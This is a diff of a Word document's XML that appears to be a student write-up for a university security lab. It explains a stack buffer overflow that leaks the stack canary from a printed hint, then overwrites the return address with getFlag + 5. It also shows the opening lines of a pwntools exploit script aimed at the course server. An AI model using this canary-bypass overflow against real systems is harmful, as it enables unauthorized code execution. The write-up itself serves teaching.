+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The hint that is given during execution likely points to the location in memory where </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> resides. Therefore, in order to leak the canary, I capture the output that is sent </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">right after </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>“Here’s a hint: “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, i.e. the memory address of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer+offset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>. I then send 24 bytes of junk, the canary value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, 8 more bytes of junk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, and then the address of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + 5. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5686,6 +4562,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -5736,9 +4614,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EC4E196" wp14:editId="76D68414">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79327286" wp14:editId="1F608148">
             <wp:extent cx="5972810" cy="1522730"/>
             <wp:effectExtent l="0" t="0" r="8890" b="1270"/>
             <wp:docPr id="1429024128" name="Picture 2" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
@@ -5846,6 +4723,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -5857,11 +4736,45 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> registry onto stack (stack alignment becomes off by 8), and thus the </w:t>
+        <w:t xml:space="preserve"> registry</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (frame pointer)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> onto stack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">stack alignment becomes off by 8), and thus the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -5931,8 +4844,9 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="420F3286" wp14:editId="166CD076">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="544C71B6" wp14:editId="13B322B2">
             <wp:extent cx="5343525" cy="1781175"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="227121358" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated"/>
@@ -6031,6 +4945,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -6047,9 +4963,10 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
-          <w:u w:val="single"/>
         </w:rPr>
         <w:t>40121b</w:t>
       </w:r>
@@ -6064,6 +4981,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -6080,6 +4999,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -6274,123 +5195,1562 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>#!/usr/bin/python3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pwn </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pwn </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">io </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> remote(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'inf226.puffling.no'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>7002</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io.recvuntil(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'? '</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io.sendline(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'24'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">r </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
